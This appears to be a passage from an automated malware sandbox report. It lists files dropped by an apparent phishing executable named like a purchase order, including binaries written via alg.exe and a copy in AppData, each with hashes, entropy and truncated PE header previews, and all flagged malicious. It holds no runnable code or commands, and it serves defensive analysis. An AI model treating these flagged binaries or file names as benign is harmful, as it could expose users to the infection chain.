                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.....i.J... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):4897792
                                                                                                                                                                                                                                    Entropy (8bit):6.829765160584648
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:o8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKe:zv2gM+qwXLg7pPgw/DSZHaD527BWG
                                                                                                                                                                                                                                    MD5:AC17B46AB05C0DDDF57AAA9219227CDB
                                                                                                                                                                                                                                    SHA1:98CDD5F6447551B1AF0C8094D4CEEAA8B84A6920
                                                                                                                                                                                                                                    SHA-256:B5481E33AB3A9F4152A4ED4BFA4411C9F795991485F7C364568DB241A980F585
                                                                                                                                                                                                                                    SHA-512:768590550208C56ED5723F05A51C4FB75900968E8B899F74C714109063C248E531AD796FC459EC1BFF07BC3B5888157D1D9595120889B06365512303A4C55ABA
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.......J... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2156544
                                                                                                                                                                                                                                    Entropy (8bit):6.95357402618607
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:wtjqL8fH+8aUbp8D/8+xyWApsqjnhMgeiCl7G0nehbGZpbD:8jKK+81FI/8zbDmg27RnWGj
                                                                                                                                                                                                                                    MD5:F297876CF2E1E89EB3A7A8D327EA100C
                                                                                                                                                                                                                                    SHA1:D05EEB9E2730B8DAA9230E6CEC94DFEAD6774947
                                                                                                                                                                                                                                    SHA-256:2B43DB9AD28FD3C5CDB466D5AA1C59EDD49129E13B3CD745651B15DD9C3FD663
                                                                                                                                                                                                                                    SHA-512:A38FCEC82B913847D9DEA03DC1B694C8C26D420F836F1879141C8727950EA8DFACC5B2DCB0B044D1BB90D4A91DC8913B4EE4DBDBDB08A63F15F8E47E444B4289
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......F.....................@.............................P"......!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2370560
                                                                                                                                                                                                                                    Entropy (8bit):7.032388104396015
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:KAMsOu3JfCIGnZuTodRFYKBrFDbWp9Dmg27RnWGj:KAMa38ZuTSoD527BWG
                                                                                                                                                                                                                                    MD5:68BC1F22379C76D8591A3549FD33B16D
                                                                                                                                                                                                                                    SHA1:FD9311E55AECE8CD1421073B09783A54F261E6FF
                                                                                                                                                                                                                                    SHA-256:CD3FABD39DFB0F16A4B420E9FC3C1C39BA94C9B5095D50D894838CC0740B2B88
                                                                                                                                                                                                                                    SHA-512:B97F7F0329AACE7789973BA1D3CCFFF5D6CF5EB768F83D2AC3854559665C84712E51ABCD241CDCD9A34A0E748E98C6F24C9ECD199B00C7B960E61B4EDE31B980
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%.......$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1984512
                                                                                                                                                                                                                                    Entropy (8bit):7.104340353534792
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:xwbK7tnhD4aH6wD2Krx5NgOOagQE8JdsqjnhMgeiCl7G0nehbGZpbD:xSK7Fhslq2EPfOGEsDmg27RnWGj
                                                                                                                                                                                                                                    MD5:41727798D7F9CD8C19B2B3C98C09A4D0
                                                                                                                                                                                                                                    SHA1:49E502789E204A6DCF67B45AD4181B3FBCC747B9
                                                                                                                                                                                                                                    SHA-256:89C6FF4D43FEAD3B85D44249F28523EF1CC57A3DB60FDE95598022F450B9DB8E
                                                                                                                                                                                                                                    SHA-512:3DD10CA3E0E7774ACDCF3F238B26053DD4DB1B4B0BA5F49CF792D80152E714C4DA7B5D4F96C76E1C6411786417EC4638FDD7E385AF551E9D74F78E8FEFF4B02C
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."............................@....................................9..... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1779712
                                                                                                                                                                                                                                    Entropy (8bit):7.158068051224507
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:zKI7Twj5KDHxJ1FxyD+/wsG18bbQtsqjnhMgeiCl7G0nehbGZpbD:zv7e0j31mD+/wDGbWDmg27RnWGj
                                                                                                                                                                                                                                    MD5:65C89D53C582A2957A90701EB3995C6E
                                                                                                                                                                                                                                    SHA1:A24985AC48C7206F4B028E69FADB2F91D480D8AD
                                                                                                                                                                                                                                    SHA-256:EFA76A54EA967FC7E5C36F7A8368DB66CBE55A53BBAC19E872BA8F7ABA4CA80B
                                                                                                                                                                                                                                    SHA-512:EA4AE69317D6EFF6285F3CD6D602E6B34B4204344B34152967348C93E909AD76D781DD8783BF962AF0F8A100950C52D2F190B53A8C14A5FCA5C319B0A96CD859
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."..........B.................@.................................... ..... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1378304
                                                                                                                                                                                                                                    Entropy (8bit):5.377428517783645
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:tQUVPDHhSGXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:WyhSGsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:9E72BFABD8DEA8A3EF4E4BAD248290CF
                                                                                                                                                                                                                                    SHA1:6DA98999FCA9994CA4EEB573876F1153227BF2A0
                                                                                                                                                                                                                                    SHA-256:2AF419D459279BCBAF8A891605ECD1E522C574DD01F3ECE1061B455DCF7FF0B3
                                                                                                                                                                                                                                    SHA-512:10FE11EB401837234D4D1C483941DB62B452B77D0084D9FA70C49B31FDC2EB396CF882B3CA45F851D9FD4DF07502F091622BD57C2BB8E4C38EFAFFF5FBA6CB63
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................p......l..... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1286656
                                                                                                                                                                                                                                    Entropy (8bit):7.222111230196331
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:EsFfc1VyFn5UQn652bO4HFsqjnhMgeiCl7G0nehbGZpbD:EsFcIn5rJ/Dmg27RnWGj
                                                                                                                                                                                                                                    MD5:373172D896DE6F41FFBE2672F9E40A4C
                                                                                                                                                                                                                                    SHA1:2E70D68A54D6E896D31CAFE01697E65357C1A046
                                                                                                                                                                                                                                    SHA-256:FDD592F0BF7A6CC79C6E75A3CE8A3460DDA62953836EA289925F1BE8A18ECE9A
                                                                                                                                                                                                                                    SHA-512:72AE16A993C6BE82F624CDCA5374834D132639DCC086586B504E0124B85EFF793127DCE629F3366C3386E1344164C99BD32E1110215A7E690D0D9538F9ED90A1
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@.......................................... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1246208
                                                                                                                                                                                                                                    Entropy (8bit):7.494267101397232
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:Yt9o6p4xQbiKI69wpemIwpel96sqjnhMgeiCl7G0nehbGZpbD:Yt9faQbtl2peapelkDmg27RnWGj
                                                                                                                                                                                                                                    MD5:65F1DC248E5BC99D02DADF3E02C4161C
                                                                                                                                                                                                                                    SHA1:4D43DB84A1AF800E852FC4B081DBA71CE2E59869
                                                                                                                                                                                                                                    SHA-256:B386A5C7822E75E32D400EFB16E14CD70657DEFBDB04F3DFB1FC72CC12751E97
                                                                                                                                                                                                                                    SHA-512:CACC084FB919110B19958E22E9E4ADAD64D986030750591E1DA692FB0F660ABBF013514AB49DD62E14A4B62F3747D3290D1C32B940AB5574A83B40DEDD38B94F
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@.......................................... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1356800
                                                                                                                                                                                                                                    Entropy (8bit):5.347828379839608
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:7QVTZu0JtsqjnhMgeiCl7G0nehbGZpbD:MVTZu0Dmg27RnWGj
                                                                                                                                                                                                                                    MD5:08206B3FFD609A760CC2937EEAE299EF
                                                                                                                                                                                                                                    SHA1:E8DF29675912E1A1DCD5C91E9D7D2E48D1AFB7B1
                                                                                                                                                                                                                                    SHA-256:918AB477BEDB26B49C2FC3662C3C8285128DAE03F3982323E6F3332F493DB2BB
                                                                                                                                                                                                                                    SHA-512:02147328069DEAD4E3EF55E0AF05DB29DE5434051D4F6FA10CB37A50DD7A34C30228BD50DAF2E4E01B95D5C75833D9341D499696A716B8B2F10759C96DDBB621
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P............ .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1344000
                                                                                                                                                                                                                                    Entropy (8bit):6.808376383606787
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:ZC1vpgXcZHzbsqjnhMgeiCl7G0nehbGZpbD:ZC1vpIcNPDmg27RnWGj
                                                                                                                                                                                                                                    MD5:D0417A882B9FBB0D90CF46AF2B128BF5
                                                                                                                                                                                                                                    SHA1:F3E0E6F7F3B9D2500E7E7B28576A5DD192BEEDDD
                                                                                                                                                                                                                                    SHA-256:386C59E31A735BFD78A04758B7672F512CFFA38714A71746B78B20DC8A0FD4F3
                                                                                                                                                                                                                                    SHA-512:57DB99EFA1513B01843AA2D7E30A3FFC02A26504100745C3643F8129152089B945B9219B78E0219E76697FCA2CB92C8DAB0B91CFA5DDFC533C01A7CC5070A543
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@......................................... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1200128
                                                                                                                                                                                                                                    Entropy (8bit):5.1400227499322115
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:0SwjPXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:0vPsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:C85776315E14F26D432516F8C891489C
                                                                                                                                                                                                                                    SHA1:DC4128E18F8E46EA34F057936F0087B938D905F0
                                                                                                                                                                                                                                    SHA-256:6C9A8D6713B508187718596B073F919DE0836C3DDEA9EABD42E01862EB80E07F
                                                                                                                                                                                                                                    SHA-512:8607B69F25DD3C0676CF71B7D246E014BB662BE21812A4BBADD76DB10C9F919A0EDCCF9D10DE35077C4D479EF8863E9F81C1A64E6EF8C9AF356DAAF7C0EE94A8
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@.......................................... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...P...p...@..................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1408512
                                                                                                                                                                                                                                    Entropy (8bit):5.4411487011559165
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:BWKntIfGpdsqjnhMgeiCl7G0nehbGZpbD:Y8Ie3Dmg27RnWGj
                                                                                                                                                                                                                                    MD5:49EDE90C03C06BD793D532E6598F51EE
                                                                                                                                                                                                                                    SHA1:09BB794EED1E7A58B8DC389988A9F8DE61640592
                                                                                                                                                                                                                                    SHA-256:953128D6326D68B9FF702495C905D1C115B98ECE6A32CB74909A19E2BFF9F112
                                                                                                                                                                                                                                    SHA-512:2AEA9E678213C0334EBCADD99CCD385DEF7912E109DF17982608201EA46EDD25217D607E5658EA15C12F4B5D610AC71085A06154C03FAED5F3C9365AB6303298
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@.......................................... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1185280
                                                                                                                                                                                                                                    Entropy (8bit):5.10328214822101
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:BIhTXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:8TsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:0DD6F15FCC57CB9E9314300C348E1170
                                                                                                                                                                                                                                    SHA1:1A2BA22738A4FF7AC48F71D82285B59AA2A97B2E
                                                                                                                                                                                                                                    SHA-256:188A671DBAD55C9082EF35752595C64F076933BA9385EC2CD4D0B86684999C96
                                                                                                                                                                                                                                    SHA-512:50706B28BE42F686843455A7CBD33824C53A6E41E8263F2880E5E144B5CDB7263763EF7ECAC0ECE9068FB19C00823A2BCF8EE4B9D86058900A8FA5120BFCA52F
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@....................................t..... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1531904
                                                                                                                                                                                                                                    Entropy (8bit):5.42119774776156
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:t8oREwt2ioQ3J+RqsqjnhMgeiCl7G0nehbGZpbD:t8oRpoF+Dmg27RnWGj
                                                                                                                                                                                                                                    MD5:A3BC1AB65318EF80451FBB21D6D8FD90
                                                                                                                                                                                                                                    SHA1:6EA522224502440319A26149FE8523B933A5DAE4
                                                                                                                                                                                                                                    SHA-256:E1318853E8D5F86AD57353ED722EDB67A80F8DA760F028E69FB83C66450095AA
                                                                                                                                                                                                                                    SHA-512:1A110A68D6326DE5B523354E5E9FB3422BC98D7429EFAB21430DB28B318FC8F843788F69B0A6764E612CD624011E7B80059CB1EEF753DEB683E19FA53AE39388
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@.......................................... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...P.......@... ..............@...........................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1216
                                                                                                                                                                                                                                    Entropy (8bit):5.34331486778365
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\zeXKjViL.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1216
                                                                                                                                                                                                                                    Entropy (8bit):5.34331486778365
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2232
                                                                                                                                                                                                                                    Entropy (8bit):5.380192968514367
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZmUyus:+LHyIFKL3IZ2KRH9Ouggs
                                                                                                                                                                                                                                    MD5:B884D46C735FA019EEE79EC313FFA707
                                                                                                                                                                                                                                    SHA1:CAE46541C4C8A3EA3FBA10A48F27C3D81950FEF4
                                                                                                                                                                                                                                    SHA-256:4A8C67C5F11EDE57F90714010B41E89F8EE8D1D3CE9907018FC9A7081E5C840A
